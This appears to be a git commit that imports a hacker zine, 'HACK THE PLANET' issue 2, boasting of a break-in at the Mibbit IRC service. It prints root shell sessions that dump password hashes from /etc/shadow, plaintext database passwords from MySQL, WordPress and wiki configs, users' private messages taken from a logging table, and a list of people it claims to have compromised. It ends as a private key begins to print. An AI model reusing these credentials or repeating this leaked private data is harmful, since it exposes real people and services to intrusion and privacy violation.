1st import into tree

This commit is contained in:
Rui Reis 2016-12-14 20:40:02 +00:00
parent 340df9dd28
commit c5cb7129ca
32 changed files with 101137 additions and 0 deletions

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

13899
h0no/h0no 2.txt Normal file

File diff suppressed because it is too large Load Diff

13794
h0no/h0no 3.txt Normal file

File diff suppressed because it is too large Load Diff

14416
h0no/h0no.txt Normal file

File diff suppressed because it is too large Load Diff

747
htp/HTP-2.txt Normal file
View File

@ -0,0 +1,747 @@
HACK THE PLANET
:: Table of Contents ::
0x01 ~ Preface
0x02 ~ tools.mibbit.com
- 0x03 ~ PM logs
0x04 ~ status.mibbit.com
0x05 ~ sidewinder.netonecom.net
0x06 ~ d0x
0x07 ~ exit
:: 0x01 - Preface ::
You may have read the about the various attention-whoring skid injections of LulzSec in the news lately, who hasn't?
Apparently, anyone can pick up Havij, LFImap, or LOIC and make media headlines today. It seems they have succeeded in
defacing the name of the anti-sec movement, turning it into a faux-revolutionary battle cry in the form of #antisec.
However, anti-sec is not what it is being portrayed as. In actuality, anti-sec is the practice of keeping one's
exploits and hacks to oneself for the good of everyone else (or personal profit, depending on who you ask). LulzSec, I
would throw in a note here, but it seems I'm too late, most of you are already raided. To the rest, make your time.
Not on the front page of the latest hacking busts and takedowns, the more skilled among us know not to broadcast our
various 0wnages. We silently slip in and sift through large networks. Releases are private. Obviously, when you have a
group that comes along such as Lulzsec, the question is not what they will get into, but how long they will last.
More importantly, I would like to establish that the former Scene has very nearly disappeared since the rise of groups
like Lulzsec. Blindly exploiting and staging large scale unjustified attacks against arbitrary organizations is not the
mentality of hacking. Hacking is about curiousity. Hacking is about information. Attacking government entities so you
can give the media your devoid justice statement is not hacking. It's called bullshit. I've seen enough garbage from
Lulzsec releases.
Today, we would like to provide the community with a special release, exclusively for all of the skidiots on Mibbit
fueling Lulzsec/#antisec efforts. Enjoy.
- HTP
targ3t:
- Mibbit
0wn3d:
- Axod Azander Havvy
- Hercule Joshua Kitsune
- Molkmin Pottsi Sindacious
:: 0x02 - 0wnage - tools.mibbit.com ::
[h () ck ~]$ ssh root () tools mibbit com
root () tools mibbit com's password:
Last login: Fri Aug 12 23:16:22 2011 from [redacted]
root () tools:~# uname -a
Linux tools.mibbit.com 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux
root () tools:~# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
ntp:x:102:104::/home/ntp:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
wwwadmin:x:1000:1000::/home/wwwadmin:/bin/bash
mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:105:107::/var/spool/exim4:/bin/false
root:$1$6793e8d9$aGW9MH6RaZmSP4Tncpwrb1:14728:0:99999:7:::
daemon:*:14728:0:99999:7:::
bin:*:14728:0:99999:7:::
sys:*:14728:0:99999:7:::
sync:*:14728:0:99999:7:::
games:*:14728:0:99999:7:::
man:*:14728:0:99999:7:::
lp:*:14728:0:99999:7:::
mail:*:14728:0:99999:7:::
news:*:14728:0:99999:7:::
uucp:*:14728:0:99999:7:::
proxy:*:14728:0:99999:7:::
www-data:*:14728:0:99999:7:::
backup:*:14728:0:99999:7:::
list:*:14728:0:99999:7:::
irc:*:14728:0:99999:7:::
gnats:*:14728:0:99999:7:::
nobody:*:14728:0:99999:7:::
libuuid:!:14728:0:99999:7:::
syslog:*:14728:0:99999:7:::
ntp:*:14728:0:99999:7:::
sshd:*:14728:0:99999:7:::
wwwadmin:$6$.EejimbY$xKAXfpd3nBlNeoQ6pBWBqh673jW2ytSmL5WoUkXaRxadV/fUIM2nQcxm1mGzk1YI9t3yQH8XMzpzSHpNv1jb00:15048:0:99999:7:::
mysql:!:15048:0:99999:7:::
Debian-exim:!:15075:0:99999:7:::
root () tools:~# ps aux | grep log
root 201 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/0]
root 202 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/1]
root 203 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/2]
root 204 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/3]
syslog 9019 0.0 0.2 21200 1288 ? Sl Mar15 1:35 rsyslogd -c4
wwwadmin 18565 0.0 0.6 5056 3360 ? S Mar31 22:01 /home/wwwadmin/loggerbot/eggdrop ./logger1
root () tools:~# ls -al /
total 96
drwxr-xr-x 22 root root 4096 Mar 15 22:22 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxrwxrwx 20 root root 4096 Aug 6 23:14 OLD_DATA
drwxr-xr-x 2 root root 4096 Mar 15 12:19 bin
drwxr-xr-x 2 root root 4096 Apr 29 2010 boot
drwxr-xr-x 11 root root 13640 Mar 15 12:20 dev
drwxr-xr-x 76 root root 4096 Aug 13 01:26 etc
drwxr-xr-x 3 root root 4096 Mar 15 12:31 home
drwxr-xr-x 17 root root 12288 Aug 9 00:38 lib
drwx------ 2 root root 16384 Apr 29 2010 lost+found
drwxr-xr-x 2 root root 4096 Apr 29 2010 media
drwxr-xr-x 2 root root 4096 Apr 23 2010 mnt
drwxr-xr-x 2 root root 4096 Apr 29 2010 opt
dr-xr-xr-x 117 root root 0 Mar 15 12:04 proc
drwx------ 4 root root 4096 Aug 13 02:32 root
drwxr-xr-x 2 root root 4096 Mar 15 12:20 sbin
drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux
drwxr-xr-x 2 root root 4096 Apr 29 2010 srv
drwxr-xr-x 12 root root 0 Mar 15 12:04 sys
drwxrwxrwt 4 root root 4096 Aug 12 08:40 tmp
drwxr-xr-x 11 root root 4096 Aug 9 00:44 usr
drwxr-xr-x 15 root root 4096 Aug 9 00:44 var
root () tools:~# ls -al /home
total 12
drwxr-xr-x 3 root root 4096 Mar 15 12:31 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 wwwadmin
root () tools:~# ls -al /home/wwwadmin
total 1076
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 .
drwxr-xr-x 3 root root 4096 Mar 15 12:31 ..
-rw-r--r-- 1 wwwadmin wwwadmin 5014 Aug 7 20:51 .bash_history
-rw-r--r-- 1 wwwadmin wwwadmin 220 Apr 19 2010 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3136 Aug 7 17:39 .bashrc
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:10 .cache
-rw-r--r-- 1 wwwadmin wwwadmin 19 Jan 29 2009 .hercpw
-rw-r--r-- 1 wwwadmin wwwadmin 148 Apr 11 2010 .htpasswd
-rw------- 1 wwwadmin wwwadmin 177 Aug 6 15:34 .lesshst
-rw------- 1 wwwadmin wwwadmin 214 Mar 16 20:20 .mysql_history
-rw------- 1 wwwadmin wwwadmin 55 Mar 16 18:19 .php_history
-rw-r--r-- 1 wwwadmin wwwadmin 700 Mar 15 20:55 .profile
-rw-r--r-- 1 wwwadmin wwwadmin 66 Mar 31 16:37 .selected_editor
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:53 .ssh
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Mar 15 21:20 .vim
-rw------- 1 wwwadmin wwwadmin 13346 Aug 12 16:13 .viminfo
-rw-r--r-- 1 wwwadmin wwwadmin 4425 Mar 15 20:53 .vimrc
-rw-r--r-- 1 wwwadmin wwwadmin 993262 Mar 31 14:46 eggdrop1.6.20.tar.bz2
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Apr 16 15:01 kenneth
drwxr-xr-x 10 wwwadmin wwwadmin 4096 Aug 13 02:00 loggerbot
-rw-r--r-- 1 wwwadmin wwwadmin 45 Apr 5 20:40 test.php
root () tools:~# ls -al /OLD_DATA
total 132
drwxrwxrwx 20 root root 4096 Aug 6 23:14 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 2 root root 4096 Mar 15 10:46 bin
drwxr-xr-x 2 root root 4096 Oct 20 2008 boot
drwxr-xr-x 4 root root 8192 Mar 15 09:49 dev
drwxr-xr-x 76 root root 4096 Mar 15 10:46 etc
drwxr-xr-x 5 root root 4096 Jan 12 2009 home
drwxr-xr-x 12 root root 8192 Mar 15 10:46 lib
drwx------ 2 root root 16384 Nov 25 2008 lost+found
drwxr-xr-x 2 root root 4096 Nov 25 2008 media
drwxr-xr-x 2 root root 4096 Oct 20 2008 mnt
drwxr-xr-x 2 root root 4096 Nov 25 2008 opt
drwxr-xr-x 2 root root 4096 Oct 20 2008 proc
drwxr-xr-x 3 root root 4096 Mar 7 22:29 root
drwxr-xr-x 2 root root 4096 Mar 15 10:46 sbin
-rw------- 1 root root 31903 Jan 12 2009 sql0swW3A
drwxr-xr-x 2 root root 4096 Nov 25 2008 srv
drwxr-xr-x 2 root root 4096 Oct 14 2008 sys
drwxrwxrwt 4 root root 4096 Mar 15 09:49 tmp
drwxr-xr-x 11 root root 4096 Dec 9 2008 usr
drwxr-xr-x 15 root root 4096 Dec 17 2008 var
root () tools:~# ls -al /OLD_DATA/home
total 20
drwxr-xr-x 5 root root 4096 Jan 12 2009 .
drwxrwxrwx 20 root root 4096 Aug 6 23:14 ..
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 ircadmin
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Oct 12 2009 mibbit
drwxr-xr-x 8 1002 1002 4096 Mar 15 09:29 wwwadmin
root () tools:~# ls -al /OLD_DATA/home/ircadmin/ # ALL YOUR IRCD ARE BELONG TO US
total 146816
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 .
drwxr-xr-x 5 root root 4096 Jan 12 2009 ..
-rw------- 1 1001 1001 14707 Mar 14 23:29 .bash_history
-rw-r--r-- 1 1001 1001 220 May 12 2008 .bash_logout
-rw-r--r-- 1 1001 1001 3115 May 12 2008 .bashrc
-rw------- 1 1001 1001 41 Jun 1 2010 .lesshst
-rw------- 1 1001 1001 256 Mar 12 14:44 .nano_history
-rw-r--r-- 1 1001 1001 675 May 12 2008 .profile
drwxr-xr-x 2 1001 1001 4096 Mar 7 23:44 .ssh
-rw------- 1 1001 1001 821 May 21 2009 .viminfo
drwxr-xr-x 13 1001 1001 4096 Jan 5 2010 Unreal3.2.7
drwx------ 13 1001 1001 4096 Apr 13 2009 Unreal3.2.8
drwx------ 13 1001 1001 4096 Dec 22 2010 Unreal3.2.8.1
-rw-r--r-- 1 1001 1001 8181760 Sep 9 2009 Unreal3.2.8.1.tar
-rw-r--r-- 1 1001 1001 8181760 Apr 7 2009 Unreal3.2.8.tar
drwxr-xr-x 7 1001 1001 4096 Feb 3 2009 anope-1.8.0-rc1
drwxr-xr-x 8 1001 1001 4096 Jan 7 2009 bopm
drwxr-xr-x 5 1001 1001 4096 Jan 7 2009 bopm-3.1.3
-rw------- 1 1001 1001 1475 Jul 30 2009 dead.letter
drwxr-xr-x 2 1001 1001 8192 Mar 12 14:44 dronebl
drwxr-xr-x 3 1001 1001 4096 May 4 2009 hub
drwxr-xr-x 9 1001 1001 4096 Mar 15 10:46 infobot-0.45.3
-rw-r--r-- 1 1001 1001 81 Jan 26 2010 irc.us.mibbit.net.txt
-rw-r--r-- 1 1001 1001 132744770 Feb 28 2010 ircd.tgz
-rw-r--r-- 1 1001 1001 623 Oct 27 2009 jim
-rw------- 1 1001 1001 949701 Feb 8 2010 mbox
drwxr-xr-x 7 1001 1001 4096 Jan 26 2010 services
:: 0x03 - PM logs - tools.mibbit.com ::
root () tools:~# mysql -u root -ped4e5c6e88e5
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 95641
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use www;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select concat(fromNick,' -> ',toNick,': ',data) from pmlogs;
jared -> molkmin: can the admins tell when users PM each other on this network?
jared -> molkmin: (with mibbit)
molkmin -> jared: who do you wnat to know is saying what?
jared -> molkmin: but they don't have to know that :)
karma motherfuck3r
molkmin -> alpha: not that I can see
molkmin -> alpha: I wasn't watching
molkmin -> alpha: it hardly matters :)
alpha -> molkmin: just silenced them
alpha -> molkmin: :)
molkmin -> alpha: everyone in #chat is assholes :)
alpha -> molkmin: lol
alpha -> molkmin: thanks
thX
jared -> molkmin: i've seen some scary botnets on dalnet
jared -> molkmin: they could knock you off the server in less than a second
molkmin -> jared: I've never had that happen yet
molkmin -> jared: I have a mac
??
jared -> molkmin: VNCing into a linux box
jared -> molkmin: with a windows virtualbox guest
jared -> molkmin: to use the VPN
jared -> molkmin: to connect to a terminal server at work
jared -> molkmin: friggin ridiculous
molkmin -> jared: get a freaking mac
jared -> molkmin: how would that help?
...
[h () ck ~]$ wc mibbitpms.out
51610 493903 2955301 mibbitpms.out
[h () ck ~]$ wc mibbitchanmsgs.out
622607 4558597 32539145 mibbitchanmsgs.out
f1les @ 0x07 <<<
:: 0x04 - status.mibbit.com ::
[h () ck ~]$ ssh wwwadmin () status mibbit com
wwwadmin () status mibbit com's password:
Last login: Fri Aug 12 21:18:51 2011 from [redacted]
wwwadmin () status:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
mibbit:x:1000:1000::/home/mibbit:/bin/bash
wwwadmin:x:1001:1001::/home/wwwadmin:/bin/bash
zfreebies:x:1002:1002::/home/zfreebies:/bin/bash
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
jimmy:x:1003:1003::/home/jimmy:/bin/bash
bind:x:107:109::/var/cache/bind:/bin/false
wwwadmin () status:~$ ls -alt /
total 92
drwxrwxrwt 4 root root 4096 Aug 13 07:25 tmp
drwxr-xr-x 78 root root 4096 Aug 13 01:14 etc
drwxr-xr-x 21 root root 4096 Jul 7 07:40 .
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 11 root root 12760 Jul 7 07:40 dev
drwxr-xr-x 11 root root 0 Jul 7 07:40 sys
dr-xr-xr-x 99 root root 0 Jul 7 07:40 proc
drwxr-xr-x 2 root root 4096 May 29 23:11 bin
drwxr-xr-x 15 root root 12288 May 29 23:11 lib
drwx------ 3 root root 4096 May 29 23:11 root
drwxr-xr-x 2 root root 4096 Nov 6 2010 sbin
drwxr-xr-x 6 root root 4096 Mar 4 2010 home
drwxr-xr-x 11 root root 4096 Sep 30 2009 usr
drwxr-xr-x 14 root root 4096 Aug 11 2009 var
drwxr-xr-x 2 root root 4096 Apr 23 2009 media
drwxr-xr-x 2 root root 4096 Apr 23 2009 opt
drwxr-xr-x 2 root root 4096 Apr 23 2009 srv
drwx------ 2 root root 16384 Apr 23 2009 lost+found
drwxr-xr-x 2 root root 4096 Apr 13 2009 boot
drwxr-xr-x 2 root root 4096 Apr 13 2009 mnt
drwxr-xr-x 2 root root 4096 Mar 6 2009 selinux
wwwadmin () status:~$ ls -alt /home
total 24
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 wwwadmin
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 7 mibbit mibbit 4096 Jun 29 13:30 mibbit
drwxr-xr-x 4 zfreebies zfreebies 4096 Apr 29 2010 zfreebies
drwxr-xr-x 3 jimmy jimmy 4096 Mar 8 2010 jimmy
drwxr-xr-x 6 root root 4096 Mar 4 2010 .
wwwadmin () status:~$ ls -alt
total 52
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 .
-rw------- 1 wwwadmin wwwadmin 1979 Aug 12 21:44 .mysql_history
-rw------- 1 wwwadmin wwwadmin 120 Aug 12 05:15 .nano_history
drwxrwxrwx 2 wwwadmin wwwadmin 4096 Aug 7 18:29 .ssh
-rw------- 1 wwwadmin wwwadmin 6566 Aug 7 15:02 .bash_history
drwxr-xr-x 3 wwwadmin wwwadmin 4096 Jan 26 2011 wiki_new
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Jan 25 2011 wiki_backup_25Jan
lrwxrwxrwx 1 root root 31 Jan 17 2011 blog -> /var/www/blog.mibbit.com/htdocs
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Dec 10 2010 WP_BACKUP
drwxr-xr-x 6 root root 4096 Mar 4 2010 ..
lrwxrwxrwx 1 wwwadmin wwwadmin 32 Sep 13 2009 wiki -> /var/www/wiki.mibbit.com/htdocs/
-rw-r--r-- 1 wwwadmin wwwadmin 220 Mar 2 2009 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3115 Mar 2 2009 .bashrc
-rw-r--r-- 1 wwwadmin wwwadmin 675 Mar 2 2009 .profile
wwwadmin () status:~$ ls -alt /var/www/
total 56
drwxr-xr-x 4 root root 4096 May 12 2010 www.stopitmovies.com
drwxr-xr-x 13 root root 4096 May 12 2010 .
drwxr-xr-x 4 root root 4096 Mar 24 2010 status.mibbit.com
drwxr-xr-x 4 root root 4096 Mar 16 2010 a.mibbit.com
drwxr-xr-x 6 root root 4096 Feb 19 2010 blog.mibbit.com
drwxr-xr-x 4 root root 4096 Dec 23 2009 adminwiki.mibbit.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.rollered.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.wizzig.com
drwxr-xr-x 4 www-data www-data 4096 Oct 12 2009 www.axod.net
drwxr-xr-x 5 root root 4096 Sep 30 2009 www.zfreebies.com
drwxr-xr-x 5 root root 4096 Sep 15 2009 forum.zfreebies.co.uk
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 wiki.mibbit.com
-rw-r--r-- 1 root root 45 Aug 11 2009 index.html
drwxr-xr-x 14 root root 4096 Aug 11 2009 ..
wwwadmin () status:~$ cat /var/www/a.mibbit.com/htdocs/admin/index.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "advertuser", "e5e32f36aa88");
@mysql_select_db("adverts", $sql);
wwwadmin () status:~$ cat /var/www/a.mibbit.com/htdocs/sessionError.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "root", "5068c8055ffc");
wwwadmin () status:~$ ls -alt /var/www/blog.mibbit.com/htdocs
total 308
drwxr-xr-x 5 wwwadmin wwwadmin 4096 Nov 15 2010 .
-rw-r--r-- 1 wwwadmin www-data 655 Nov 15 2010 favicon.ico
drwxr-xr-x 5 wwwadmin www-data 4096 Feb 23 2010 wp-content
-rw-r--r-- 1 wwwadmin www-data 1548 Feb 19 2010 wp-config.php
-rw-r--r-- 1 wwwadmin www-data 93445 Feb 19 2010 xmlrpc.php
-rw-r--r-- 1 wwwadmin www-data 23097 Feb 19 2010 wp-settings.php
-rw-r--r-- 1 wwwadmin www-data 3693 Feb 19 2010 wp-trackback.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rss.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-rss2.php
-rw-r--r-- 1 wwwadmin www-data 7578 Feb 19 2010 wp-mail.php
-rw-r--r-- 1 wwwadmin www-data 487 Feb 19 2010 wp-pass.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rdf.php
-rw-r--r-- 1 wwwadmin www-data 316 Feb 19 2010 wp-register.php
-rw-r--r-- 1 wwwadmin www-data 2341 Feb 19 2010 wp-load.php
-rw-r--r-- 1 wwwadmin www-data 22721 Feb 19 2010 wp-login.php
drwxr-xr-x 6 wwwadmin www-data 4096 Feb 19 2010 wp-includes
-rw-r--r-- 1 wwwadmin www-data 1946 Feb 19 2010 wp-links-opml.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-feed.php
-rw-r--r-- 1 wwwadmin www-data 1253 Feb 19 2010 wp-cron.php
-rw-r--r-- 1 wwwadmin www-data 238 Feb 19 2010 wp-commentsrss2.php
-rw-r--r-- 1 wwwadmin www-data 2616 Feb 19 2010 wp-config-sample.php
-rw-r--r-- 1 wwwadmin www-data 40400 Feb 19 2010 wp-app.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-atom.php
-rw-r--r-- 1 wwwadmin www-data 274 Feb 19 2010 wp-blog-header.php
-rw-r--r-- 1 wwwadmin www-data 3928 Feb 19 2010 wp-comments-post.php
drwxr-xr-x 8 wwwadmin www-data 4096 Feb 19 2010 wp-admin
-rw-r--r-- 1 wwwadmin www-data 15410 Feb 19 2010 license.txt
-rw-r--r-- 1 wwwadmin www-data 7644 Feb 19 2010 readme.html
-rw-r--r-- 1 wwwadmin www-data 397 Feb 19 2010 index.php
drwxr-xr-x 6 root root 4096 Feb 19 2010 ..
wwwadmin () status:~$ cat /var/www/blog.mibbit.com/htdocs/wp-config.php | head -n 8
<?php
// ** MySQL settings ** //
define('DB_NAME', 'wpblog'); // The name of the database
define('DB_USER', 'wpuser'); // Your MySQL username
define('DB_PASSWORD', '13c3cada3921'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
wwwadmin () status:~$ ls -alt /var/www/wiki.mibbit.com/htdocs/
total 720
-rw-rw-r-- 1 www-data www-data 6960 Mar 21 12:46 LocalSettings.php
drwxrwxr-x 9 www-data www-data 4096 Mar 21 12:41 extensions
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 26 2011 SpamBlacklist
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 .
drwxrwxr-x 22 www-data www-data 4096 Jan 26 2011 images
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 bin
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 config
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 docs
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 includes
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 languages
drwxrwxr-x 13 www-data www-data 12288 Jan 26 2011 maintenance
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 math
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 serialized
drwxrwxr-x 10 www-data www-data 4096 Jan 26 2011 skins
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 4 2011 cache
-rw-r--r-- 1 wwwadmin wwwadmin 59433 Jan 4 2011 RELEASE-NOTES
-rw-r--r-- 1 wwwadmin wwwadmin 2090 Jan 4 2011 CREDITS
-rw-r--r-- 1 wwwadmin wwwadmin 8821 Jan 4 2011 profileinfo.php
-rw-rw-r-- 1 root root 655 Nov 15 2010 favicon.ico
-rw-r--r-- 1 wwwadmin wwwadmin 13307 Mar 25 2010 UPGRADE
-rw-r--r-- 1 wwwadmin wwwadmin 392287 Mar 12 2010 HISTORY
-rw-r--r-- 1 wwwadmin wwwadmin 4905 Mar 8 2010 thumb.php
-rw-r--r-- 1 wwwadmin wwwadmin 4707 Feb 15 2010 api.php
-rw-r--r-- 1 wwwadmin wwwadmin 174 Feb 3 2010 php5.php5
-rw-r--r-- 1 wwwadmin wwwadmin 89 Feb 3 2010 redirect.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 86 Feb 3 2010 wiki.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 4329 Jan 1 2010 index.php
-rw-r--r-- 1 wwwadmin wwwadmin 4031 Oct 14 2009 img_auth.php
-rw-rw-r-- 1 www-data www-data 9416 Sep 13 2009 mibbit.png
-rw-rw-r-- 1 www-data www-data 1049 Sep 13 2009 AdminSettings.php
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 ..
-rw-r--r-- 1 wwwadmin wwwadmin 76 Jul 27 2009 FAQ
drwxrwxr-x 4 www-data www-data 4096 Jul 13 2009 t
drwxrwxr-x 2 www-data www-data 4096 Jul 13 2009 tests
-rw-r--r-- 1 wwwadmin wwwadmin 648 May 7 2009 StartProfiler.sample
-rw-rw-r-- 1 www-data www-data 3952 Mar 21 2009 install-utils.inc
-rw-r--r-- 1 wwwadmin wwwadmin 3054 Mar 21 2009 opensearch_desc.php
-rw-r--r-- 1 wwwadmin wwwadmin 383 Mar 21 2009 redirect.php
-rw-r--r-- 1 wwwadmin wwwadmin 32 Mar 16 2009 trackback.php5
-rw-rw-r-- 1 www-data www-data 603 Jan 7 2009 StartProfiler.php
-rw-r--r-- 1 wwwadmin wwwadmin 3649 Nov 11 2008 README
-rw-r--r-- 1 wwwadmin wwwadmin 1347 Nov 5 2008 trackback.php
-rw-r--r-- 1 wwwadmin wwwadmin 4138 Apr 18 2008 INSTALL
-rw-rw-r-- 1 www-data www-data 618 Apr 11 2008 Makefile
-rw-r--r-- 1 wwwadmin wwwadmin 39 Mar 3 2008 opensearch_desc.php5
-rw-r--r-- 1 wwwadmin wwwadmin 25 Feb 4 2008 api.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 img_auth.php5
-rw-r--r-- 1 wwwadmin wwwadmin 28 Feb 4 2008 index.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 redirect.php5
-rw-r--r-- 1 wwwadmin wwwadmin 29 Feb 4 2008 thumb.php5
-rw-r--r-- 1 wwwadmin wwwadmin 17997 Apr 5 2006 COPYING
wwwadmin () status:~$ cat /var/www/wiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikidb";
$wgDBuser = "wikiuser";
$wgDBpassword = "a69e74574db6";
$wgDBport = "5432";
$wgDBprefix = "";
$wgDBadminuser = "wikiuser";
$wgDBadminpassword = "a69e74574db6";
# Schemas for Postgres
$wgDBmwschema = "mediawiki";
$wgDBts2schema = "public";
wwwadmin () status:~$ cat /var/www/adminwiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
## Database settings
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikiadmindb";
$wgDBuser = "wikiadminuser";
$wgDBpassword = "fe102b0d7793";
# MySQL specific settings
$wgDBprefix = "";
# MySQL table options to use during installation or update
wwwadmin () status:~$ exit
Connection to status.mibbit.com closed.
:: 0x05 - sidewinder.netonecom.net ::
backup () sidewinder ~> ls -al # read world backups of all servers with /etc/shadow ROFL
total 596
drwxr-xr-x 16 backup root 432 2011-08-12 18:52 .
drwxr-xr-x 26 root root 632 2011-05-12 14:12 ..
drwxr-xr-x 2 backup users 1344 2009-08-27 10:44 amram
drwxr-xr-x 2 root root 587920 2011-08-13 12:37 awstats
-rw------- 1 backup 1452 17 2006-09-18 14:47 .bash_history
drwxr-xr-x 2 backup users 224 2009-10-07 12:58 hornet
drwxr-xr-x 2 backup users 1336 2010-08-24 11:23 ice
drwxr-xr-x 2 backup users 1216 2010-11-12 16:07 janco
drwxr-xr-x 3 backup users 264 2011-08-13 01:27 magic
drwxr-xr-x 3 backup users 1416 2011-07-26 12:32 merlin
drwxr-xr-x 2 backup users 1432 2011-05-16 05:55 multimag
drwxr-xr-x 2 backup users 1640 2010-10-11 15:49 phantom
drwxr-xr-x 2 backup users 1680 2011-01-13 15:57 sidewinder
drwx------ 2 backup users 320 2011-08-12 18:52 .ssh
drwxr-xr-x 2 backup users 1176 2009-10-14 10:52 sydex
-rw------- 1 backup 1452 4999 2011-08-12 18:52 .viminfo
backup () sidewinder ~/.ssh> cat id_dsa id_rsa # not identity, its not ASCII
-----BEGIN DSA PRIVATE KEY-----
